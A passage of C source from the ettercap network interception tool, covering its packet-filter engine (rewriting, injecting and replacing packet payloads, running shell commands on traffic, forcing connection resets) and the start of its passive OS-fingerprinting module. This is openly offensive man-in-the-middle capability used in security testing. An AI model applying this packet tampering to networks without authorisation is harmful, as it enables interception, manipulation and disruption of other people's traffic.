FTEST_LEQ: cmp_func = &cmp_leq; break; case FTEST_GEQ: cmp_func = &cmp_geq; break; default: JIT_FAULT("unsupported test operation"); break; } /* * get the value with the proper size. * 0 is a special case for strings (even binary) */ switch (fop->op.test.size) { case 0: /* string comparison */ if (cmp_func(memcmp(base + fop->op.test.offset, fop->op.test.string, fop->op.test.slen), 0) ) return FLAG_TRUE; break; case 1: /* char comparison */ if (cmp_func(*(u_int8 *)(base + fop->op.test.offset), (fop->op.test.value & 0xff)) ) return FLAG_TRUE; break; case 2: /* short int comparison */ if (cmp_func(htons(*(u_int16 *)(base + fop->op.test.offset)), (fop->op.test.value & 0xffff)) ) return FLAG_TRUE; break; case 4: /* int comparison */ if (cmp_func(htonl(*(u_int32 *)(base + fop->op.test.offset)), (fop->op.test.value & 0xffffffff)) ) return FLAG_TRUE; break; case 16: /* well IPv6 addresses should be handled as 16-byte pointer */ if (cmp_func(memcmp(base + fop->op.test.offset, fop->op.test.ipaddr, fop->op.test.size), 0) ) return FLAG_TRUE; break; default: JIT_FAULT("unsupported test size [%d]", fop->op.test.size); break; } return FLAG_FALSE; } /* * make an assignment. */ static int execute_assign(struct filter_op *fop, struct packet_object *po) { /* initialize to the beginning of the packet */ u_char *base = po->L2.header; /* check the offensiveness */ if (EC_GBL_OPTIONS->unoffensive) JIT_FAULT("Cannot modify packets in unoffensive mode"); DEBUG_MSG("filter engine: execute_assign: L%d O%d S%d", fop->op.assign.level, fop->op.assign.offset, fop->op.assign.size); /* * point to the right base. */ switch (fop->op.assign.level) { case 2: base = po->L2.header; break; case 3: base = po->L3.header; break; case 4: base = po->L4.header; break; case 5: base = po->DATA.data; break; default: JIT_FAULT("unsupported assignment level [%d]", fop->op.assign.level); break; } /* * get the value with the proper size. * 0 is a special case for strings (even binary) */ switch (fop->op.assign.size) { case 0: memcpy(base + fop->op.assign.offset, fop->op.assign.string, fop->op.assign.slen); break; case 1: *(u_int8 *)(base + fop->op.assign.offset) = (fop->op.assign.value & 0xff); break; case 2: *(u_int16 *)(base + fop->op.assign.offset) = ntohs(fop->op.assign.value & 0xffff); break; case 4: *(u_int32 *)(base + fop->op.assign.offset) = ntohl(fop->op.assign.value & 0xffffffff); break; default: JIT_FAULT("unsupported assign size [%d]", fop->op.assign.size); break; } /* mark the packet as modified */ po->flags |= PO_MODIFIED; return FLAG_TRUE; } /* * make an increment or decrement. */ static int execute_incdec(struct filter_op *fop, struct packet_object *po) { /* initialize to the beginning of the packet */ u_char *base = po->L2.header; /* check the offensiveness */ if (EC_GBL_OPTIONS->unoffensive) JIT_FAULT("Cannot modify packets in unoffensive mode"); DEBUG_MSG("filter engine: execute_incdec: L%d O%d S%d", fop->op.assign.level, fop->op.assign.offset, fop->op.assign.size); /* * point to the right base. */ switch (fop->op.assign.level) { case 2: base = po->L2.header; break; case 3: base = po->L3.header; break; case 4: base = po->L4.header; break; case 5: base = po->DATA.data; break; default: JIT_FAULT("unsupported inc/dec level [%d]", fop->op.assign.level); break; } /* * inc/dec the value with the proper size. */ switch (fop->op.assign.size) { case 1: if (fop->opcode == FOP_INC) *(u_int8 *)(base + fop->op.assign.offset) += (fop->op.assign.value & 0xff); else *(u_int8 *)(base + fop->op.assign.offset) -= (fop->op.assign.value & 0xff); break; case 2: if (fop->opcode == FOP_INC) *(u_int16 *)(base + fop->op.assign.offset) += ntohs(fop->op.assign.value & 0xffff); else *(u_int16 *)(base + fop->op.assign.offset) -= ntohs(fop->op.assign.value & 0xffff); break; case 4: if (fop->opcode == FOP_INC) *(u_int32 *)(base + fop->op.assign.offset) += ntohl(fop->op.assign.value & 0xffffffff); else *(u_int32 *)(base + fop->op.assign.offset) -= ntohl(fop->op.assign.value & 0xffffffff); break; default: JIT_FAULT("unsupported inc/dec size [%d]", fop->op.assign.size); break; } /* mark the packet as modified */ po->flags |= PO_MODIFIED; return FLAG_TRUE; } /* * search a string and return TRUE if found */ static int func_search(struct filter_op *fop, struct packet_object *po) { switch (fop->op.func.level) { case 5: /* search in the real packet */ if (memmem(po->DATA.data, po->DATA.len, fop->op.func.string, fop->op.func.slen)) return E_SUCCESS; break; case 6: /* search in the decoded/decrypted packet */ if (memmem(po->DATA.disp_data, po->DATA.disp_len, fop->op.func.string, fop->op.func.slen)) return E_SUCCESS; break; default: JIT_FAULT("unsupported search level [%d]", fop->op.func.level); break; } return -E_NOTFOUND; } /* * search a string with a regex and return TRUE if found */ static int func_regex(struct filter_op *fop, struct packet_object *po) { switch (fop->op.func.level) { case 5: /* search in the real packet */ if (regexec(fop->op.func.ropt->regex, (const char*)po->DATA.data, 0, NULL, 0) == 0) return E_SUCCESS; break; case 6: /* search in the decoded/decrypted packet */ if (regexec(fop->op.func.ropt->regex, (const char*)po->DATA.disp_data, 0, NULL, 0) == 0) return E_SUCCESS; break; default: JIT_FAULT("unsupported regex level [%d]", fop->op.func.level); break; } return -E_NOTFOUND; } /* * evaluate a perl regex and return TRUE if found */ static int func_pcre(struct filter_op *fop, struct packet_object *po) { #ifndef HAVE_PCRE (void) fop; (void) po; JIT_FAULT("pcre_regex support not compiled in ettercap"); return -E_NOTFOUND; #else int ovec[PCRE_OVEC_SIZE]; int ret; DEBUG_MSG("filter engine: func_pcre"); memset(&ovec, 0, sizeof(ovec)); switch (fop->op.func.level) { case 5: /* search in the real packet */ if ( (ret = pcre_exec(fop->op.func.ropt->pregex, fop->op.func.ropt->preg_extra, po->DATA.data, po->DATA.len, 0, 0, ovec, sizeof(ovec) / sizeof(*ovec))) < 0) return -E_NOTFOUND; /* the pcre wants to modify the packet */ if (fop->op.func.replace) { u_char *replaced; u_char *q = fop->op.func.replace; size_t i; int slen = 0; /* don't modify if in unoffensive mode */ if (EC_GBL_OPTIONS->unoffensive) JIT_FAULT("Cannot modify packets in unoffensive mode"); /* * worst case: the resulting string will need: * (n * |input|) + |subst| bytes * where * |input| is the length of the matched input string (not the regex!) * |subst| is the length of the substition string * n is the number of replacement markers in subst * * therefore, we need to count the number of $ characters first * to get an upper limit of the buffer space needed */ int markers = 0; for (i=0; q[i]; i++) { if (q[i] == '$') markers++; } /* now: i = strlen(q) */ SAFE_CALLOC(replaced, markers*(ovec[1]-ovec[0]) + i + 1, sizeof(char)); po->flags |= PO_MODIFIED; /* make the replacement */ uint8_t escaped = 0; for (i = 0; i < fop->op.func.rlen; i++) { /* we encounter an escape character (\), so the next character is to be taken literally */ if (!escaped && q[i] == '\\') { escaped = 1; } /* there is an unescaped position marker */ else if (!escaped && q[i] == '$') { /* a marker is succeeded by an integer, make sure it is there */ if (q[i+1] == '\0') JIT_FAULT("Incomplete marker at end of substitution string"); /* so now we can safely move on to the next character, our digit */ i++; /* we only support up to 9 markers since we only parse a single digit */ if (q[i] < '0' || q[i] > '9') JIT_FAULT("Incomplete marker without integer in substitution string"); int marker = q[i]-'0'; /* check if the requested marker was found in the pce */ if (marker > ret - 1 || marker == 0) JIT_FAULT("Too many marker for this pcre expression"); int t = ovec[marker * 2]; int r = ovec[marker * 2 + 1]; /* copy the sub-string in place of the marker */ for ( ; t < r; t++) replaced[slen++] = po->DATA.data[t]; } /* anything else either has no special meaning or is escaped, * so we just copy it */ else { replaced[slen++] = q[i]; escaped = 0; } } /* calculate the delta */ int delta = (ovec[0]-ovec[1])+slen; /* check if we are overflowing pcap buffer */ BUG_IF(po->DATA.data < po->packet); BUG_IF((u_int16)(EC_GBL_PCAP->snaplen - (po->DATA.data - po->packet)) <= po->DATA.len+delta); /* if the substitution string has a different length than the * matched original string, we have to move around some data */ int size_left = po->DATA.len - ovec[0] - slen; int data_left = po->DATA.len - ovec[1]; DEBUG_MSG("func_pcre: match from %d to %d, substitution length is %d\n", ovec[0], ovec[1], slen); DEBUG_MSG("func_pcre: packet size changed by %d bytes\n", delta); if (delta != 0) { /* copy everything behind the matched string to the new position */ memcpy(po->DATA.data+ovec[0]+slen, po->DATA.data + ovec[1], size_left < data_left ? size_left : data_left); } /* copy the modified buffer on the original packet */ memcpy(po->DATA.data+ovec[0], replaced, slen); po->DATA.delta += delta; po->DATA.len += delta; SAFE_FREE(replaced); } break; case 6: /* search in the decoded one */ if ( pcre_exec(fop->op.func.ropt->pregex, fop->op.func.ropt->preg_extra, po->DATA.disp_data, po->DATA.disp_len, 0, 0, NULL, 0) < 0) return -E_NOTFOUND; break; default: JIT_FAULT("unsupported pcre_regex level [%d]", fop->op.func.level); break; } return E_SUCCESS; #endif } /* * replace a string in the packet object DATA.data */ static int func_replace(struct filter_op *fop, struct packet_object *po) { u_int8 *ptr; u_int8 *end; size_t len; size_t slen = fop->op.func.slen; size_t rlen = fop->op.func.rlen; /* check the offensiveness */ if (EC_GBL_OPTIONS->unoffensive) JIT_FAULT("Cannot modify packets in unoffensive mode"); /* check if it exist at least one */ if (!memmem(po->DATA.data, po->DATA.len, fop->op.func.string, fop->op.func.slen) ) return -E_NOTFOUND; DEBUG_MSG("filter engine: func_replace"); /* * XXX BIG WARNING: * maxlen is EC_GBL_PCAP->snaplen, but we can't * rely on this forever... */ /* take the beginning and the end of the data */ ptr = po->DATA.data; end = ptr + po->DATA.len; /* do the replacement */ do { /* the len of the buffer to be analized */ len = end - ptr; /* search the string */ ptr = memmem(ptr, len, fop->op.func.string, slen); /* string no found, exit */ if (ptr == NULL) break; /* update the len */ len = end - ptr - slen; /* set the delta */ po->DATA.delta += rlen - slen; po->DATA.len += rlen - slen; /* check if we are overflowing pcap buffer */ BUG_IF(po->DATA.data < po->packet); BUG_IF((u_int16)(EC_GBL_PCAP->snaplen - (po->DATA.data - po->packet)) <= po->DATA.len); /* move the buffer to make room for the replacement string */ memmove(ptr + rlen, ptr + slen, len); /* copy the replacemente string */ memcpy(ptr, fop->op.func.replace, rlen); /* move the ptr after the replaced string */ ptr += rlen; /* adjust the new buffer end */ end += rlen - slen; /* mark the packet as modified */ po->flags |= PO_MODIFIED; } while(ptr != NULL && ptr < end); return E_SUCCESS; } /* * inject a file into the communication */ static int func_inject(struct filter_op *fop, struct packet_object *po) { int fd; void *file; size_t size, ret; /* check the offensiveness */ if (EC_GBL_OPTIONS->unoffensive) JIT_FAULT("Cannot inject packets in unoffensive mode"); DEBUG_MSG("filter engine: func_inject %s", fop->op.func.string); /* open the file */ if ((fd = open((const char*)fop->op.func.string, O_RDONLY | O_BINARY)) == -1) { USER_MSG("filter engine: inject(): File not found (%s)\n", fop->op.func.string); return -E_FATAL; } /* get the size */ size = lseek(fd, 0, SEEK_END); /* load the file in memory */ SAFE_CALLOC(file, size, sizeof(char)); /* rewind the pointer */ lseek(fd, 0, SEEK_SET); ret = read(fd, file, size); close(fd); if (ret != size) FATAL_MSG("Cannot read the file into memory"); /* check if we are overflowing pcap buffer */ if(EC_GBL_PCAP->snaplen - (po->L4.header - (po->packet + po->L2.len) + po->L4.len) <= po->DATA.len + (unsigned)size) JIT_FAULT("injected file too long"); /* copy the file into the buffer */ memcpy(po->DATA.data + po->DATA.len, file, size); /* Adjust packet len and delta */ po->DATA.delta += size; po->DATA.len += size; /* mark the packet as modified */ po->flags |= PO_MODIFIED; /* unset the flag to be dropped */ if (po->flags & PO_DROPPED) po->flags ^= PO_DROPPED; /* close and unmap the file */ SAFE_FREE(file); return E_SUCCESS; } /* * inject output of a executable into the communication */ static int func_execinject(struct filter_op *fop, struct packet_object *po) { FILE *pstream = NULL; unsigned char *output = NULL; size_t n = 0, offset = 0, size = 128; unsigned char buf[size]; /* check the offensiveness */ if (EC_GBL_OPTIONS->unoffensive) JIT_FAULT("Cannot inject packets in unoffensive mode"); DEBUG_MSG("filter engine: func_execinject %s", fop->op.func.string); /* open the pipe */ if ((pstream = popen((const char*)fop->op.func.string, "r")) == NULL) { USER_MSG("filter engine: execinject(): Command not found (%s)\n", fop->op.func.string); return -E_FATAL; } while ((n = read(fileno(pstream), buf, size)) != 0) { if (output == NULL) { SAFE_CALLOC(output, offset+n, sizeof(unsigned char)); } else { SAFE_REALLOC(output, sizeof(unsigned char)*(offset+n)); } memcpy(output+offset, buf, n); offset += n; } /* close pipe stream */ pclose(pstream); /* check if we are overflowing pcap buffer */ if(EC_GBL_PCAP->snaplen - (po->L4.header - (po->packet + po->L2.len) + po->L4.len) <= po->DATA.len + (unsigned)offset) JIT_FAULT("injected output too long"); /* copy the output into the buffer */ memcpy(po->DATA.data + po->DATA.len, output, offset); /* Adjust packet len and delta */ po->DATA.delta += offset; po->DATA.len += offset; /* mark the packet as modified */ po->flags |= PO_MODIFIED; /* unset the flag to be dropped */ if (po->flags & PO_DROPPED) po->flags ^= PO_DROPPED; /* free memory */ SAFE_FREE(output); return E_SUCCESS; } /* * replace output of a executable into the communication * executable takes communication before any change in input */ static int func_execreplace(struct filter_op *fop, struct packet_object *po) { int child_stdout[2], child_stdin[2]; pid_t child_pid; unsigned char *output = NULL; size_t n = 0, offset = 0, size = 128; unsigned char buf[size]; /* check the offensiveness */ if (EC_GBL_OPTIONS->unoffensive) JIT_FAULT("Cannot replace packets in unoffensive mode"); DEBUG_MSG("filter engine: func_execreplace %s", fop->op.func.string); /* open the pipe */ if (pipe(child_stdin) != 0 || pipe(child_stdout) != 0) { USER_MSG("filter engine: execreplace(): failed to create pipes\n"); return -E_FATAL; } if ((child_pid = fork()) < 0) { USER_MSG("filter engine: execreplace(): failed to fork\n"); return -E_FATAL; } if (child_pid == 0) { char *const argv[] = { "/bin/sh", "-c", fop->op.func.string, NULL }; if (dup2(child_stdin[0], STDIN_FILENO) == -1 || dup2(child_stdout[1], STDOUT_FILENO) == -1) { exit(EXIT_FAILURE); } close(child_stdin[1]); close(child_stdout[0]); execv(argv[0], argv); exit(EXIT_FAILURE); } close(child_stdin[0]); close(child_stdout[1]); /* fill child STDIN with DATA */ while (offset < po->DATA.len) { n = write(child_stdin[1], po->DATA.data + offset, po->DATA.len - offset); if (n == (size_t)-1) { break; } offset += n; } close(child_stdin[1]); /* Fill child STDIN with DATA */ offset = 0; while ((n = read(child_stdout[0], buf, size)) != 0) { if (output == NULL) { SAFE_CALLOC(output, offset+n, sizeof(unsigned char)); } else { SAFE_REALLOC(output, sizeof(unsigned char)*(offset+n)); } memcpy(output+offset, buf, n); offset += n; } /* close pipe stream */ close(child_stdout[0]); /* check if we are overflowing pcap buffer */ if(EC_GBL_PCAP->snaplen - (po->L4.header - (po->packet + po->L2.len) + po->L4.len) <= po->DATA.len + (unsigned)offset) JIT_FAULT("replaced output too long"); /* copy the output into the buffer */ memcpy(po->DATA.data, output, offset); /* Adjust packet len and delta */ if ((u_int)offset > po->DATA.len) { po->DATA.delta += (int)((u_int)offset - po->DATA.len); } else { po->DATA.delta -= (int)(po->DATA.len - (u_int)offset); } po->DATA.len = offset; /* mark the packet as modified */ po->flags |= PO_MODIFIED; /* unset the flag to be dropped */ if (po->flags & PO_DROPPED) po->flags ^= PO_DROPPED; /* free memory */ SAFE_FREE(output); return E_SUCCESS; } /* * log the packet to a file */ static int func_log(struct filter_op *fop, struct packet_object *po) { int fd; DEBUG_MSG("filter engine: func_log"); /* open the file */ fd = open((const char*)fop->op.func.string, O_CREAT | O_APPEND | O_RDWR | O_BINARY, 0600); if (fd == -1) { USER_MSG("filter engine: Cannot open file %s\n", fop->op.func.string); return -E_FATAL; } /* which data should I have to log ? */ switch(fop->op.func.level) { case 5: if (write(fd, po->DATA.data, po->DATA.len) < 0) USER_MSG("filter engine: Cannot write to file...%d\n", errno); break; case 6: if (write(fd, po->DATA.disp_data, po->DATA.disp_len) < 0) USER_MSG("filter engine: Cannot write to file...\n"); break; default: JIT_FAULT("unsupported log level [%d]", fop->op.func.level); break; } /* close the file */ close(fd); return E_SUCCESS; } /* * drop the packet */ static int func_drop(struct packet_object *po) { DEBUG_MSG("filter engine: func_drop"); /* se the flag to be dropped */ po->flags |= PO_DROPPED; /* the delta is all the payload */ po->DATA.delta -= po->DATA.len; po->DATA.len = 0; return E_SUCCESS; } /* * kill the connection: * TCP: reset * UDP: icmp port unreachable */ static int func_kill(struct packet_object *po) { DEBUG_MSG("filter engine: func_kill"); if (po->L4.proto == NL_TYPE_TCP) { /* reset both sides */ /* * we can trust the ack number. * at least one side will be reset. the other is automatically reset */ send_tcp(&po->L3.src, &po->L3.dst, po->L4.src, po->L4.dst, po->L4.seq, 0, TH_RST, NULL, 0); send_tcp(&po->L3.dst, &po->L3.src, po->L4.dst, po->L4.src, po->L4.ack, 0, TH_RST, NULL, 0); } else if (po->L4.proto == NL_TYPE_UDP) { send_L3_icmp_unreach(po); } return E_SUCCESS; } /* * execute the given command */ static int func_exec(struct filter_op *fop) { pid_t pid; DEBUG_MSG("filter engine: func_exec: %s", fop->op.func.string); /* * the command must be executed by a child. * we are forwding packets, and we cannot wait * for the execution of the command */ pid = fork(); /* check if the fork was successful */ if (pid == -1) SEMIFATAL_ERROR("filter engine: fork() failed, cannot execute %s", fop->op.func.string); /* differentiate between the parent and the child */ if (!pid) { int k, param_length; char **param = NULL; char *q = (char*)fop->op.func.string; char *p; int i = 0; /* split the string */ for (p = strsep(&q, " "); p != NULL; p = strsep(&q, " ")) { /* allocate the array */ SAFE_REALLOC(param, (i + 1) * sizeof(char *)); /* copy the tokens in the array */ param[i++] = strdup(p); } /* NULL terminate the array */ SAFE_REALLOC(param, (i + 1) * sizeof(char *)); param[i] = NULL; param_length= i + 1; //because there is a SAFE_REALLOC after the for. /* * close input, output and error. * we don't want to clobber the interface * with output from the child */ close(fileno(stdin)); close(fileno(stdout)); close(fileno(stderr)); /* execute the command */ execve(param[0], param, NULL); /* reached on errors */ for(k= 0; k < param_length; ++k) SAFE_FREE(param[k]); SAFE_FREE(param); _exit(-1); } return E_SUCCESS; } /* * functions for comparisons */ static int cmp_eq(u_int32 a, u_int32 b) { return (a == b); } static int cmp_neq(u_int32 a, u_int32 b) { return (a != b); } static int cmp_lt(u_int32 a, u_int32 b) { return (a < b); } static int cmp_gt(u_int32 a, u_int32 b) { return (a > b); } static int cmp_leq(u_int32 a, u_int32 b) { return (a <= b); } static int cmp_geq(u_int32 a, u_int32 b) { return (a >= b); } /* * load the filter from a file */ int filter_load_file(const char *filename, struct filter_list **list, uint8_t enabled) { int fd; void *file; size_t size, ret; struct filter_env *fenv; struct filter_header fh; DEBUG_MSG("filter_load_file (%s)", filename); /* open the file */ if ((fd = open(filename, O_RDONLY | O_BINARY)) == -1) FATAL_MSG("File not found or permission denied"); /* read the header */ if (read(fd, &fh, sizeof(struct filter_header)) != sizeof(struct filter_header)) FATAL_MSG("The file is corrupted"); /* sanity checks */ if (fh.magic != htons(EC_FILTER_MAGIC)) FATAL_MSG("Bad magic in filter file\n" "Make sure to compile the filter with a current version of etterfilter"); /* check pointer alignment */ if (fh.code % 8) FATAL_MSG("Bad instruction pointer alignment\n" "Make sure to compile the filter with a current version of etterfilter"); /* which version has compiled the filter ? */ if (strcmp(fh.version, EC_VERSION)) FATAL_MSG("Filter compiled for a different version"); /* get the size */ size = lseek(fd, 0, SEEK_END); /* load the file in memory */ SAFE_CALLOC(file, size, sizeof(char)); /* rewind the pointer */ lseek(fd, 0, SEEK_SET); ret = read(fd, file, size); close(fd); if (ret != size) FATAL_MSG("Cannot read the file into memory"); FILTERS_LOCK; /* advance to the end of the filter list */ while (*list) list = &(*list)->next; /* allocate memory for the list entry */ SAFE_CALLOC(*list, 1, sizeof(struct filter_list)); fenv = &(*list)->env; /* set the global variables */ fenv->map = file; fenv->chain = (struct filter_op *)(file + fh.code); fenv->len = size - sizeof(struct filter_header) - fh.code; /* * adjust all the string pointers * they must point to the data segment */ reconstruct_strings(fenv, &fh); /* save the name of the loaded filter */ (*list)->name = strdup(filename); /* enable the filter if requested */ (*list)->enabled = enabled; FILTERS_UNLOCK; /* compile the regex to speed up the matching */ if (compile_regex(fenv) != E_SUCCESS) return -E_FATAL; USER_MSG("Content filters loaded from %s...\n", filename); return E_SUCCESS; } /* * unload a filter list entry */ void filter_unload(struct filter_list **list) { if (*list == NULL) return; FILTERS_LOCK; struct filter_env *fenv= &(*list)->env; size_t i = 0; struct filter_op *fop = fenv->chain; DEBUG_MSG("filter_unload"); /* free the memory alloc'd for regex */ while (fop != NULL && i < (fenv->len / sizeof(struct filter_op)) ) { /* search for func regex and pcre */ if(fop[i].opcode == FOP_FUNC) { switch(fop[i].op.func.op) { case FFUNC_REGEX: regfree(fop[i].op.func.ropt->regex); SAFE_FREE(fop[i].op.func.ropt); break; case FFUNC_PCRE: #ifdef HAVE_PCRE pcre_free(fop[i].op.func.ropt->pregex); pcre_free(fop[i].op.func.ropt->preg_extra); SAFE_FREE(fop[i].op.func.ropt); #endif break; } } i++; } /* free the memory region containing the file */ SAFE_FREE(fenv->map); /* wipe the pointer */ fenv->map = NULL; fenv->chain = NULL; fenv->len = 0; SAFE_FREE((*list)->name); /* reclose the filter list */ struct filter_list **ptr = list; struct filter_list *succ = (*list)->next; *ptr = succ; SAFE_FREE(*list); FILTERS_UNLOCK; } void filter_clear(void) { FILTERS_LOCK; struct filter_list **l = EC_GBL_FILTERS; while (*l) { filter_unload(l); } FILTERS_UNLOCK; } /* * replace relative offset to real address in the strings fields */ static void reconstruct_strings(struct filter_env *fenv, struct filter_header *fh) { size_t i = 0; struct filter_op *fop = fenv->chain; /* parse all the instruction */ while (i < (fenv->len / sizeof(struct filter_op)) ) { /* * the real address for a string is the base of the mmap'd file * plus the base of the data segment plus the offset in the field */ switch(fop[i].opcode) { case FOP_FUNC: if (fop[i].op.func.slen) fop[i].op.func.string = (fenv->map + fh->data + (size_t)fop[i].op.func.string); if (fop[i].op.func.rlen) fop[i].op.func.replace = (fenv->map + fh->data + (size_t)fop[i].op.func.replace); break; case FOP_TEST: if (fop[i].op.test.slen) fop[i].op.test.string = (fenv->map + fh->data + (size_t)fop[i].op.test.string); break; case FOP_ASSIGN: if (fop[i].op.assign.slen) fop[i].op.assign.string = (fenv->map + fh->data + (size_t)fop[i].op.assign.string); break; } i++; } } /* * compile the regex of a filter_op */ static int compile_regex(struct filter_env *fenv) { size_t i = 0; struct filter_op *fop = fenv->chain; char errbuf[100]; int err; #ifdef HAVE_PCRE const char *perrbuf = NULL; #endif /* parse all the instruction */ while (i < (fenv->len / sizeof(struct filter_op)) ) { /* search for func regex and pcre */ if(fop[i].opcode == FOP_FUNC) { switch(fop[i].op.func.op) { case FFUNC_REGEX: /* alloc the structures */ SAFE_CALLOC(fop[i].op.func.ropt, 1, sizeof(struct regex_opt)); SAFE_CALLOC(fop[i].op.func.ropt->regex, 1, sizeof(regex_t)); /* prepare the regex */ err = regcomp(fop[i].op.func.ropt->regex, (const char*)fop[i].op.func.string, REG_EXTENDED | REG_NOSUB | REG_ICASE ); if (err) { regerror(err, fop[i].op.func.ropt->regex, errbuf, sizeof(errbuf)); FATAL_MSG("filter engine: %s", errbuf); } break; case FFUNC_PCRE: #ifdef HAVE_PCRE /* alloc the structure */ SAFE_CALLOC(fop[i].op.func.ropt, 1, sizeof(struct regex_opt)); /* prepare the regex (with default option) */ fop[i].op.func.ropt->pregex = pcre_compile(fop[i].op.func.string, 0, &perrbuf, &err, NULL ); if (fop[i].op.func.ropt->pregex == NULL) FATAL_MSG("filter engine: %s\n", perrbuf); /* optimize the pcre */ fop[i].op.func.ropt->preg_extra = pcre_study(fop[i].op.func.ropt->pregex, 0, &perrbuf); if (perrbuf != NULL) FATAL_MSG("filter engine: %s\n", perrbuf); #endif break; } } i++; } return E_SUCCESS; } /* * Walk the list of loaded filters and call the callback function * for every single list item along with the argument passed. * The callback function can stop the list from being traversed * any further by returning a false value. */ void filter_walk_list( int(*cb)(struct filter_list*, void*), void *arg) { struct filter_list **l; FILTERS_LOCK; for (l = EC_GBL_FILTERS; *l != NULL; l = &(*l)->next) { /* do not traverse the list any further if the callback tells us so */ if (!cb(*l, arg)) break; } FILTERS_UNLOCK; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_fingerprint.c000664 000000 000000 00000025552 13711276346 017424 0ustar00rootroot000000 000000 /* ettercap -- passive TCP finterprint module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #ifdef HAVE_CURL #include #endif #define LOAD_ENTRY(p,h,v) do { \ SAFE_CALLOC((p), 1, sizeof(struct entry)); \ memcpy((p)->finger, h, FINGER_LEN); \ (p)->finger[FINGER_LEN] = '\0'; \ (p)->os = strdup (v); \ (p)->os[strlen(p->os)-1] = '\0'; \ } while (0) /* globals */ static SLIST_HEAD(, entry) finger_head; struct entry { char finger[FINGER_LEN+1]; char *os; SLIST_ENTRY(entry) next; }; /* protos */ static void fingerprint_discard(void); /*****************************************/ static void fingerprint_discard(void) { struct entry *l; while (SLIST_FIRST(&finger_head) != NULL) { l = SLIST_FIRST(&finger_head); SLIST_REMOVE_HEAD(&finger_head, next); SAFE_FREE(l->os); SAFE_FREE(l); } DEBUG_MSG("ATEXIT: fingerprint_discard"); return; } int fingerprint_init(void) { struct entry *p; struct entry *last = NULL; int i; char line[128]; char os[OS_LEN+1]; char finger[FINGER_LEN+1]; char *ptr; FILE *f; i = 0; f = open_data("share", TCP_FINGERPRINTS, FOPEN_READ_TEXT); ON_ERROR(f, NULL, "Cannot open %s", TCP_FINGERPRINTS); while (fgets(line, 128, f) != 0) { if ( (ptr = strchr(line, '#')) ) *ptr = 0; /* skip 0 length line */ if (!strlen(line)) continue; strncpy(finger, line, FINGER_LEN); strncpy(os, line + FINGER_LEN + 1, OS_LEN); LOAD_ENTRY(p, finger, os); /* sort the list ascending */ if (last == NULL) SLIST_INSERT_HEAD(&finger_head, p, next); else SLIST_INSERT_AFTER(last, p, next); /* set the last entry */ last = p; /* count the fingerprints */ i++; } DEBUG_MSG("fingerprint_init -- %d fingers loaded", i); USER_MSG("%4d tcp OS fingerprint\n", i); fclose(f); atexit(fingerprint_discard); return i; } /* * search in the database for a given fingerprint */ int fingerprint_search(const char *f, char *dst) { struct entry *l; //Do not process if length is invalid if (!strcmp(f, "") || strlen(f) != FINGER_LEN) { strncpy(dst, "UNKNOWN", 8); return E_SUCCESS; } /* if the fingerprint matches, copy it in the dst and * return E_SUCCESS. * if it is not found, copy the next finger in dst * and return -E_NOTFOUND, it is the nearest fingerprint */ SLIST_FOREACH(l, &finger_head, next) { /* this is exact match */ if ( memcmp(l->finger, f, FINGER_LEN) == 0) { strncpy(dst, l->os, OS_LEN+1); return E_SUCCESS; } /* * if not found seach with wildcalderd MSS * but he same WINDOW size */ if ( memcmp(l->finger, f, FINGER_LEN) > 0) { /* the window field is FINGER_MSS bytes */ char win[FINGER_MSS]; char pattern[FINGER_LEN+1]; /* the is the next in the list */ strncpy(dst, l->os, OS_LEN+1); strncpy(win, f, FINGER_MSS); win[FINGER_MSS-1] = '\0'; /* pattern will be something like: * * 0000:*:TT:WS:0:0:0:0:F:LT */ snprintf(pattern, FINGER_LEN+1, "%s:*:%s", win, f + FINGER_TTL); /* search for equal WINDOW but wildcarded MSS */ while (l != SLIST_END(&finger_head) && !strncmp(l->finger, win, 4)) { if (match_pattern(l->finger, pattern)) { /* save the nearest one (wildcarded MSS) */ strncpy(dst, l->os, OS_LEN+1); return -E_NOTFOUND; } l = SLIST_NEXT(l, next); } return -E_NOTFOUND; } } if(EC_GBL_CONF->submit_fingerprint) fingerprint_submit(NULL, NULL, f, "Unknown"); return -E_NOTFOUND; } /* * initialize the fingerprint string */ void fingerprint_default(char *finger) { /* * initialize the fingerprint * * WWWW:_MSS:TT:WS:S:N:D:T:F:LT */ strncpy(finger,"0000:_MSS:TT:WS:0:0:0:0:F:LT", 29); } /* * add a parameter to the finger string */ void fingerprint_push(char *finger, int param, int value) { char tmp[10]; int lt_old = 0; ON_ERROR(finger, NULL, "finger_push used on NULL string !!"); switch (param) { case FINGER_WINDOW: snprintf(tmp, sizeof(tmp), "%04X", value); strncpy(finger + FINGER_WINDOW, tmp, 5); break; case FINGER_MSS: snprintf(tmp, sizeof(tmp), "%04X", value); strncpy(finger + FINGER_MSS, tmp, 5); break; case FINGER_TTL: snprintf(tmp, sizeof(tmp), "%02X", TTL_PREDICTOR(value)); strncpy(finger + FINGER_TTL, tmp, 3); break; case FINGER_WS: snprintf(tmp, sizeof(tmp), "%02X", value); strncpy(finger + FINGER_WS, tmp, 3); break; case FINGER_SACK: snprintf(tmp, sizeof(tmp), "%d", value); strncpy(finger + FINGER_SACK, tmp, 2); break; case FINGER_NOP: snprintf(tmp, sizeof(tmp), "%d", value); strncpy(finger + FINGER_NOP, tmp, 2); break; case FINGER_DF: snprintf(tmp, sizeof(tmp), "%d", value); strncpy(finger + FINGER_DF, tmp, 2); break; case FINGER_TIMESTAMP: snprintf(tmp, sizeof(tmp), "%d", value); strncpy(finger + FINGER_TIMESTAMP, tmp, 2); break; case FINGER_TCPFLAG: if (value == 1) strncpy(finger + FINGER_TCPFLAG, "A", 2); else strncpy(finger + FINGER_TCPFLAG, "S", 2); break; case FINGER_LT: /* * since the LENGTH is the sum of the IP header * and the TCP header, we have to calculate it * in two steps. (decoders are unaware of other layers) */ lt_old = strtoul(finger + FINGER_LT, NULL, 16); snprintf(tmp, sizeof(tmp), "%02X", value + lt_old); strncpy(finger + FINGER_LT, tmp, 3); break; } } /* * round the TTL to the nearest power of 2 (ceiling) */ u_int8 TTL_PREDICTOR(u_int8 x) { register u_int8 i = x; register u_int8 j = 1; register u_int8 c = 0; do { 